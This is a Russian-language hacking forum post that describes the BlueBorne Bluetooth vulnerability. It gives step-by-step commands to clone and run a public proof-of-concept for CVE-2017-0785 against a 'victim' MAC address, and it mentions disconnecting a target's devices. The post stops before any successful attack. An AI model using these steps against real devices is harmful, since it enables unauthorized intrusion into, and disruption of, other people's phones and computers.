Использование BlueBorn ¶
By: Nekit on 2019-08-21 10 ч.
Использование BlueBorn
Всем здрасте, дорогие форумчане. Я хочу вам рассказать в этой статье о такой уязвимости как BlueBorne. Эту уязвимость можно эксплуатировать в Bluetooth. Устройства со включенном bluetooth уже становятся уязвимыми.
Что такое BlueBorne?
BlueBorne - это вектор атаки, с помощью которого хакеры могут использовать Bluetooth-соединения для проникновения и получения полного контроля над целевыми устройствами. BlueBorne влияет на обычные компьютеры, мобильные телефоны и расширяющуюся область IoT-устройств. Атака не требует, чтобы целевое устройство было сопряжено с устройством злоумышленника или даже переведено в режим обнаружения. До сих пор идентифицировано восемь уязвимостей нулевого дня, которые указывают на существование и потенциал вектора атаки. Считается, что на различных платформах, использующих Bluetooth, ожидается обнаружение множества других уязвимостей. Эти уязвимости полностью работоспособны и могут быть успешно использованы, как продемонстрировано в нашем исследовании. Вектор атаки BlueBorne может использоваться для совершения большого количества нарушений, включая удаленное выполнение кода, а также атаки «человек посередине».
Перейдем к практике
Я использую Kali Linux и вам советую
Для начала нам нужно скачать пару файлов с GitHub.
root@kali:~Desktop# git clone https://github.com/ojasookert/CVE-2017-0785.git
Здесь я уже был в директории Рабочий стол, поэтому файлы туда и скача́ются.
Далее, поочередно введите команды
sudo apt-get install bluetooth libbluetooth-dev
sudo pip install pybluez
sudo pip install pwntools
Иногда вас будут спрашивать Do you want it(y/n):
На подобии этого. Вводите 'Y'
Если вы все сделали правильно и не было ошибок вы молодцы
Если появились ошибки, попробуйте ввести
apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
pip install --upgrade pip
pip install --upgrade pwntools
Теперь все ГОТОВО
Заходим в терминал, подключаемся к директории CVE-2017-0785
cd Desktop/CVE-2017-0785
Это в моем случае
Пишем
python CVE-2017-0785.py
Консоль пишет
Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX
нужно указать цель. Указываете Вместо иксов МАС-адрес своей жертвы. Возникает вопрос: Как узнать МАС-адрес жертвы. Ответ: Я не знаю.(думаю тут теряется весь смысл статьи). Существует программы для скана сетей, всякие zenmap или nmap.
Если вы знаете МАС-адрес то пишите
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX
И так как я на компьютере, а тут нету bluetooth, у меня появляется ошибка.
На этом статья заканчивается)))), так как для продолжения мне нужен либо ноут либо антенна для обнаружения воздушных сетей, но как вы понимаете у меня нет ни того, ни того. Но как появится возможность я продолжу статью. А для самых любопытных я уже дал достаточно чтобы продолжить самому.
По задумке можно получить доступ к устройству или например зафлудить отправлениями сетевых пакетов, тем самым сбросив подключение блютус и жертва(она ведь подключена, например к наушникам и слушает музыку через блютус) теряет соединение.
Вот пример удаленного подключения _ttps://www.youtube.com/watch?v=QrHbZPO9Rnc
мне нельзя вставлять гиперссылки(
Источники:
_ttps://github.com/ojasookert/CVE-2017-0785
_ttps://www.armis.com/blueborne/
Также этого дерьма полно в интернете
Всем спасибо и удачи.